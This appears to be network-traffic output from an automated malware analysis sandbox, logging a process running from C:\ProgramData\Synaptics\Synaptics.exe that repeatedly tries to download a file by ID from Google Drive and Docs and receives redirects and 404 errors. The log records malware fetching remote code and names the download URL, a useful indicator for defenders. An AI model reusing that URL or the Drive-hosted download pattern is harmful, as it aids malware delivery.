                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-MslHnAuCR7u2Vn7NNOBS6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.949721142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:25 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-30 10:25:26 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6NJWRzAGzN6dk7Rk4Q0QhRvXdxRVKEpMmWNU-TskVxm1TNk1I3X8D7u4p65YTUVeg4
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:25 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CTKQS5mfjll2Jmlgd_8V5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC; expires=Tue, 01-Jul-2025 10:25:25 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:26 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 6f 4c 74 6e 69 32 51 4d 71 6d 74 4f 41 48 32 7a 68 62 74 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VoLtni2QMqmtOAH2zhbt0A">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2024-12-30 10:25:26 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.949720142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:25 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-30 10:25:26 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC77wJA2R2cStc_feaZHAIIPpMzFvKXA5mkmJbpAdI4OZeVgzn1zN1VpvzJHxiJFUfw4CTvfvaE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-jlf0ta-mYkkCMI-P_n4i7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4; expires=Tue, 01-Jul-2025 10:25:26 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:26 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 61 38 38 4d 41 33 53 7a 4a 74 68 72 67 4e 48 44 59 78 44 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ga88MA3SzJthrgNHDYxDBg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2024-12-30 10:25:26 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.949725142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CZn1QAtJP4jzWieZ7QUjiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.949724142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:26 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nL55Lj2ukiAXp1mPhWAnUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.949726142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:26 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-30 10:25:27 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5wi2I7y0K9mY2txpBIIWgKBlThL8-oIBVE46o-CJc5PxteDjP4RoCpMG0c-3-cIMshNtURuCY
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-2K36qYj9mli-atvxMVYbWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:27 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 5a 48 78 58 47 4a 42 57 34 54 7a 42 76 6d 7a 6d 32 71 65 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zZHxXGJBW4TzBvmzm2qeGA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2024-12-30 10:25:27 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.949727142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:26 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-30 10:25:27 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4Rk7x6G9Cw79s4CKlRE7KeTlU1mqjjlKVB72oI9FBzAvSObvqiSz5RxvXlvdwPj7jL
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:27 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ItDEC91G38a8pGYrGg3IJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=qGDJMLG_t58BS-V2j56tFICrxKsP-s96iV7zJACl0Iwax3pxWGUggnrNtuf7_7rv6xKv31XKe5BeOmnFq96EZD-EkZIVIIpKZY2kJ2SB4_RuWaQWV_SxzywN-Dnl34h_aNSkS9Dyy0XyTdvfDmqVKjIRELt2S9Yfib9Oe9wU6ha3OHDAqdrsl_PK; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:27 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 6f 69 55 4a 63 52 62 4f 47 47 37 57 42 72 4c 51 68 54 76 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DoiUJcRbOGG7WBrLQhTvrQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2024-12-30 10:25:27 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.949731142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:27 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nrHzaMEm_jWD9JRyLtB0ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.949732142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3b2jCazLwZHWJ-ju5yiobQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


